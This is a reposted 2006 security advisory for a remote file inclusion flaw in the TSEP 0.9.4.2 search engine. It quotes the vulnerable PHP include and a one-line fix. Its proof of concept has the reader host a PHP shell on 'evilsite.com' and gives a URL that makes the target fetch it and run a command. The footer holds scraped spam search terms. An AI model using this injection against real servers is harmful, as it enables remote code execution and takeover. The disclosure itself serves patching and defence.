about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability




2006-08-01 TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability
Rated as : Moderate Risk

+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Venedor ...........: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+ <?php require (
$tsep_config["absPath"]."/include/tsepversion.txt" );
?>
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized before being
used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in copyright.php
+
+--------------------------------------------------------------------
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+
http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+-------------------------[ E O F ]----------------------------------
securitydot.net - 2006-08-01

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 05:57:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Blue Coat tbsc.zw78. iranian se Shann ARA linux priv lovehina.c Translate: Sixe.wwwco www.ftdqsb Crack%2\\r nokia 770 Mdona meta sploi AFLAM SEX 2.6.9-34.E ASS 18 plesk 8.0. powered+by www.yzmoth maxcpm.inf Www.dase b pornclips www.huoton ESMTP Exim all cartoo www.om178. sxs libon Anarkali n Www.Sex.Co WWWSCHOOLG Axs bd.fangkex Aseansex.c CMS is Fre www.trish mambo Remo raw.com Trisha nud pmni Nagma actr Www sexyph www.56hx.c Englishsex www.fzrjob 200 /compo thumbzilla 200 /compo Thirsh vid Www.Doogse